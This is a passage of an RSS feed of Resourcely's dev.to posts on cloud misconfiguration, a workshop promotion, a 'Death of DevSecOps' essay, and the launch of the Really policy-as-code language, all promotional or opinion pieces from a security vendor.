&lt;p&gt;Given there is not enough time to react to a misconfigured cloud asset being breached, proactively securing configuration is the only way to protect against the risk of potential cloud data breaches. To do that, security teams must shift from a reactive, issue-centric view of the world to a proactive, preventative strategy, powered by secure, sensible defaults for configuring cloud resources.&lt;/p&gt;

&lt;p&gt;Resourcely enables your security, infrastructure and developer teams to create proactive, simple, continuously enforced guardrails to safeguard your cloud resources. &lt;a href="https://www.resourcely.io/sign-up"&gt;Get started with Resourcely&lt;/a&gt; to make your organization secure-by-default. Massive shoutout to Jason Craig and Will Bengtson, who had the initial idea for this post.&lt;/p&gt;

</description>
      <category>security</category>
      <category>cybersecurity</category>
      <category>hacks</category>
    </item>
    <item>
      <title>Resourcely founder-led in person or virtual hands-on workshop</title>
      <dc:creator>Ryan Cartwright</dc:creator>
      <pubDate>Tue, 25 Jun 2024 22:10:06 +0000</pubDate>
      <link>https://dev.to/resourcely/resourcely-founder-led-in-person-or-virtual-hands-on-workshop-1o46</link>
      <guid>https://dev.to/resourcely/resourcely-founder-led-in-person-or-virtual-hands-on-workshop-1o46</guid>
      <description>&lt;p&gt;Join Resourcely for a free founder-led in person or virtual hands-on workshop.&lt;/p&gt;

&lt;p&gt;Learn how easy it is to enable cloud infrastructure paved roads to prevent misconfigurations for your organization.&lt;/p&gt;

&lt;p&gt;In this session, you’ll learn how to:&lt;/p&gt;

&lt;p&gt;✅ Navigate Resourcely user interface, and connection options.&lt;/p&gt;

&lt;p&gt;✅ Integrate your SSO provider&lt;/p&gt;

&lt;p&gt;✅ Integrate your VCS provider&lt;/p&gt;

&lt;p&gt;✅ Understand what Resourcely Blueprints and Guardrails are in our catalog out of the box&lt;/p&gt;

&lt;p&gt;✅ Understand the importance of Global Contexts&lt;/p&gt;

&lt;p&gt;✅ Understand configuration options for Blueprints&lt;/p&gt;

&lt;p&gt;✅ Understand configuration options for Really, our policy as code language&lt;/p&gt;

&lt;p&gt;✅ Understand how Resourcely can integrate into your existing cicd process&lt;/p&gt;

&lt;p&gt;✅ Import your existing terraform modules to transform them into module backed blueprints&lt;/p&gt;

&lt;p&gt;✅ Understand Resourcely usage metrics available&lt;/p&gt;

&lt;p&gt;✅ Learn how to configure the resourcely.yaml to manage different environments&lt;/p&gt;

&lt;p&gt;✅ Create new Blueprints and Guardrails using Foundry for your specific use cases&lt;/p&gt;

&lt;p&gt;Elevate your infrastructure as code maturity today!&lt;/p&gt;

&lt;p&gt;&lt;a href="https://www.resourcely.io/event/resourcely-workshop?utm-source=dev.to&amp;amp;utm-medium=post?utm-campaign=dev.to-blog"&gt;Request workshop&lt;/a&gt;&lt;/p&gt;

</description>
      <category>devops</category>
      <category>beginners</category>
      <category>learning</category>
      <category>security</category>
    </item>
    <item>
      <title>Death of DevSecOps, Part 2</title>
      <dc:creator>Christopher Reuter</dc:creator>
      <pubDate>Wed, 05 Jun 2024 15:40:13 +0000</pubDate>
      <link>https://dev.to/resourcely/death-of-devsecops-part-2-2766</link>
      <guid>https://dev.to/resourcely/death-of-devsecops-part-2-2766</guid>
      <description>&lt;p&gt;Written by Travis McPeak, Resourcely CEO&lt;/p&gt;

&lt;p&gt;In &lt;a href="https://www.resourcely.io/post/death-of-devsecops-part-1-the-rise-of-cloud-and-devops"&gt;part 1&lt;/a&gt; of this series, I covered the history of security in the early days of the cloud revolution. Circa 2014, DevOps practices started to be adopted by security teams, resulting in the era of DevSecOps. We’ll cover this concept, the dreams of so many, and the reality that ensued.&lt;/p&gt;

&lt;h2&gt;
  
  
  Security is a laggard
&lt;/h2&gt;

&lt;p&gt;One pattern that I have observed about security teams is they are slow to change. Security was not a forethought in the pre-Internet days, because it was never really a problem. These teams were only created after internet adoption started becoming more widespread, and they integrated into the waterfall processes of the early days - because that is how development teams worked with infrastructure teams.&lt;/p&gt;

&lt;p&gt;After cloud infrastructure became available, DevOps as a practice started to spread like wildfire as we covered in part 1. Why did it take security teams 10 years to fully adopt agile practices and integrate security into DevOps?&lt;/p&gt;

&lt;p&gt;Traditional security focused on building a strong perimeter for a static environment. While the rapid iteration and change of DevOps was a boon to development teams, it was naturally uncomfortable for security teams.&lt;br&gt;
New tools and processes meant new attack vectors: something security teams are naturally wary of&lt;br&gt;
Security teams were not incentivized to move quickly, given they were a standalone, siloed organization&lt;br&gt;
They started first by trying to apply legacy processes such as waterfall-style review and approval, to an agile methodology - and this failed&lt;/p&gt;

&lt;h2&gt;
  
  
  From DevOps to DevSecOps: the dream
&lt;/h2&gt;

&lt;p&gt;By ~2015, it had become apparent that security had lost their gate. As DevOps became the de facto standard, established security teams started losing political capital as they impacted development lifecycles by resisting change. As challenger companies saw success by shipping quickly and cheaply, it became obvious that established security waterfall style could not continue. VC money poured into challenger tech companies that applied the same concepts to security that they were applying to development: shifting decision-making and implementation onto the engineer.&lt;/p&gt;

&lt;p&gt;DevSecOps appears to have been coined around 2014, usually attributed to &lt;a href="https://www.linkedin.com/pulse/intuits-devsecops-war-games-gamification-culture-hacking-e-weeks/"&gt;Shannon Lietz of Intuit&lt;/a&gt;. The promise of DevSecOps was to further speed development lifecycles without sacrificing security, by embedding security choices into DevOps (hence DevSecOps). Security and software leaders thought they could:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Save money on security teams by turning them into guideline providers&lt;/li&gt;
&lt;li&gt;Get security for free from developer teams, who would make practical choices to enforce guidelines&lt;/li&gt;
&lt;li&gt;Proactively support developers with automation&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;However, the dream of DevSecOps ignores some realities that make it a failed practice.&lt;/p&gt;

&lt;h2&gt;
  
  
  DevSecOps: The reality of today
&lt;/h2&gt;

&lt;p&gt;As DevSecOps was adopted throughout the late ‘10s and early ‘20s, it became clear that the benefits did not materialize as promised. Don’t get me wrong, there have been some improvements:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Some integration into change management: CI process that can enforce security reviews before deployment happens&lt;/li&gt;
&lt;li&gt;Multi-environment support: Build pipelines can progress the same build through environments&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This marginal progress isn’t enough. There are too many vulnerabilities, too many issues, and not enough time for the manual world of security that we’ve built for ourselves. It turns out that pushing security into DevOps processes sucks for all of those involved. Security teams are overwhelmed, spending all their time measuring faults and making lists of vulnerabilities. Devs are spending unnecessary cycles on security config, when they want to do actual development.&lt;/p&gt;

&lt;p&gt;We’ve been left with the worst of both worlds with DevSecOps of today. Why is that?&lt;/p&gt;

&lt;h3&gt;
  
  
  Devs aren’t security or infra experts
&lt;/h3&gt;

&lt;p&gt;One of the primary assumptions of DevSecOps was that developers would be able to make security and infrastructure-related decisions that were correct. Turns out that in practice, this is not the case. Why? Developers aren’t security or infrastructure experts, and they don’t have the time to become experts. Instead of addressing the fundamental problem, we try to up-skill our developers on security and force training hell onto everybody involved.&lt;/p&gt;

&lt;p&gt;Consider a scenario where a developer wants to deploy using an Azure VM and write from that VM to blob storage, and a security team stipulates that it should only be deployed within a company’s VPC. Only an experienced Azure infrastructure expert would be able to configure this in a time-efficient way: this requires 5+ different resources, and if you’re using something like Terraform it requires even more expertise!&lt;/p&gt;

&lt;h3&gt;
  
  
  Automation has failed us
&lt;/h3&gt;

&lt;p&gt;Another key expectation by early DevSecOps experts was that automation would make up for developer time. Platform teams started to emerge in the late ‘10s and early ‘20s, providing tools for developers to move faster. To date, security automation is primarily a reactive function: we still expect configuration decisions to be made by developers, and we serve them a list of issues to fix after the fact.&lt;/p&gt;

&lt;h3&gt;
  
  
  Worst of both worlds
&lt;/h3&gt;

&lt;p&gt;DevSecOps has evolved into the worst of both worlds. With developers that aren’t experts in security or infrastructure, and a lack of automation, we now have:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rampant misconfiguration&lt;/li&gt;
&lt;li&gt;Frequent incidents and outages&lt;/li&gt;
&lt;li&gt;Constant triage of issues&lt;/li&gt;
&lt;li&gt;Reactive posture management, resulting in huge backlogs of security issues&lt;/li&gt;
&lt;li&gt;Overwhelmed developers who don’t want to engage with security&lt;/li&gt;
&lt;li&gt;A lack of clear ownership means when there’s a problem, it is unclear who needs to act&lt;/li&gt;
&lt;/ul&gt;

&lt;p&gt;This means the Sec in DevSecOps hasn’t kept up its end of the bargain. We’ve only marginally improved (and that’s debatable), and we’re only incrementally more secure.&lt;/p&gt;

&lt;h3&gt;
  
  
  The answer? Secure-by-default
&lt;/h3&gt;

&lt;p&gt;In part 3, we will cover the future: secure-by-default. New tools and technologies mean that we can take the burden of security and infrastructure configuration off developers’ plates, allowing software teams to ship quickly and companies to preserve security and reliability.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>devsecops</category>
      <category>security</category>
    </item>
    <item>
      <title>Introducing Really: A New Policy as Code DSL… that doesn't suck</title>
      <dc:creator>Ryan Cartwright</dc:creator>
      <pubDate>Wed, 29 May 2024 03:48:00 +0000</pubDate>
      <link>https://dev.to/resourcely/introducing-really-a-new-policy-as-code-dsl-that-doesnt-suck-9l1</link>
      <guid>https://dev.to/resourcely/introducing-really-a-new-policy-as-code-dsl-that-doesnt-suck-9l1</guid>
      <description>&lt;p&gt;Using Rego for cloud configuration is awful. Use Really: policy-as-code built for humans.&lt;/p&gt;

&lt;h2&gt;
  
  
  Announcing Really
&lt;/h2&gt;

&lt;p&gt;When we started building Resourcely, the global configuration engine for cloud infrastructure, we slowly realized that the status quo of policy-as-code was broken. Writing our first Resourcely guardrails in Rego took hours to create and even more time to maintain. Writing new policies was extremely tedious and time-intensive, especially given the fact that we wanted to make them flexible. To help achieve our mission of making infrastructure more secure, it became evident that a new policy language would be needed that allowed policy to be written and maintained without headaches.&lt;/p&gt;

&lt;p&gt;The Resourcely team has spent the last 6 months working on developing that new policy language, and today we are introducing &lt;a href="https://docs.resourcely.io/using-resourcely/setting-up-guardrails/authoring-your-own-guardrails?utm-source=dev.to"&gt;Really&lt;/a&gt;: a policy language and enforcement engine that is built to be written and read by humans - not machines. With the introduction of Really, policy can be created in minutes compared to hours, with a human-readable syntax that looks remarkably like SQL. The readability of our structured policy language means that writing, deciphering, and adjusting policy isn’t a nightmare, and your policy team can take vacation without worrying about their pager going off.&lt;/p&gt;

&lt;h2&gt;
  
  
  Yet Another Config Language (YACL)
&lt;/h2&gt;

&lt;p&gt;Why did we invest millions of dollars in time to build Yet Another Config Language (YACL)?&lt;/p&gt;

&lt;p&gt;Read full blog &lt;a href="https://www.resourcely.io/post/announcing-really?utm-source=dev.to"&gt;here&lt;/a&gt;.&lt;/p&gt;

</description>
      <category>beginners</category>
      <category>programming</category>
      <category>productivity</category>
      <category>devops</category>
    </item>
    <item>
      <title>Taming misconfiguration chaos with Resourcely</title>
      <dc:creator>Ryan Cartwright</dc:creator>
      <pubDate>Mon, 15 Apr 2024 01:40:57 +0000</pubDate>
      <link>https://dev.to/resourcely/taming-misconfiguration-chaos-with-resourcely-501k</link>
      <guid>https://dev.to/resourcely/taming-misconfiguration-chaos-with-resourcely-501k</guid>
      <description>&lt;p&gt;Misconfiguration of cloud infrastructure is the root cause of slow developer velocity and prolific incidents causing millions of dollars in damage.&lt;/p&gt;

&lt;p&gt;Resourcely is a cloud resource configuration platform, built to give developers a paved road for deploying quickly and securely. tl;dr Resourcely generates secure-by-default Terraform code for anything that can be managed with a terraform provider.&lt;/p&gt;

&lt;p&gt;Join Resourcely's CEO, Travis McPeak, on April 16th as he walks through why misconfiguration exists, the impact it has on businesses around the world, and how Resourcely can help increase developer velocity and mitigate incident risk.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://app.livestorm.co/resourcely/resourcely-webinar-taming-misconfiguration-chaos"&gt;https://app.livestorm.co/resourcely/resourcely-webinar-taming-misconfiguration-chaos&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Resourcely exists to make cloud resources more secure and make developers' lives easier. In a DevOps world, developers have too many responsibilities, including writing code, testing code, deploying their services, responding to outages, provisioning cloud services, and keeping their services secure. With so much on their plate, developers need tools that give them best practices in these areas without thinking about them.&lt;/p&gt;

</description>
      <category>devops</category>
      <category>security</category>
      <category>misconfiguration</category>
      <category>cloud</category>
    </item>
  </channel>
</rss>
